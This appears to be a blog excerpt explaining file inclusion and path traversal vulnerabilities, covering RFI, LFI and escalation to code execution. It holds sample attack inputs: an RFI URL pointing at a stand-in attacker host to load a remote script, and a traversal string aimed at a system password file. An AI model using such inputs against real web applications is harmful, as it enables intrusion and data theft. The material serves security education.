File Inclusion, Path Traversal

Structure of a Web Application

Web applications consist of two main parts:

  • Frontend: The user interface, typically built with frameworks like React, Angular, or Vue.js, communicates with the backend via APIs.
  • Backend: Processes user requests, interacts with databases, and serves data to the frontend, using languages like
PHP, Python, JavaScript, and frameworks like Node.js, Django, or Laravel

Server-Side Scripting and File Handling

Server-side scripts generate content for the frontend and can access the server’s file system and databases. Proper handling and validation of file inputs are crucial to prevent security vulnerabilities.

File Inclusion

File Inclusion occurs when an application dynamically includes files based on user input. Without proper validation, attackers can exploit this to include malicious files or access sensitive files.

Path Traversal

Path traversal attacks use traversal strings like "../” to navigate through the file system and access files outside the intended directory. These can be classified into:

  • Relative Pathing: Locating files based on the current directory
e.g., include('./folder/file.php')
  • Absolute Pathing: Specifying the complete path from the root directory
e.g., /var/www/html/folder/file.php

Remote File Inclusion (RFI)

RFI allows attackers to include remote files through input manipulation. For instance, a vulnerable application might include a URL parameter that an attacker can replace with a path to a malicious script

e.g., include.php?page=http://attacker.com/exploit.php

Local File Inclusion (LFI)

LFI occurs when attackers exploit vulnerable input fields to access or execute files on the server. They typically use traversal strings to access files outside the intended directory

e.g., include.php?page=../../../../etc/passwt

LFI can escalate to Remote Code Execution (RCE) if attackers inject executable code into a file that the server later includes or executes, such as through log poisoning.

Understanding these vulnerabilities is essential for securing web applications and preventing unauthorized access or code execution.

Full Story : https://hacklido.com/blog/836-file-inclusion-path-traversal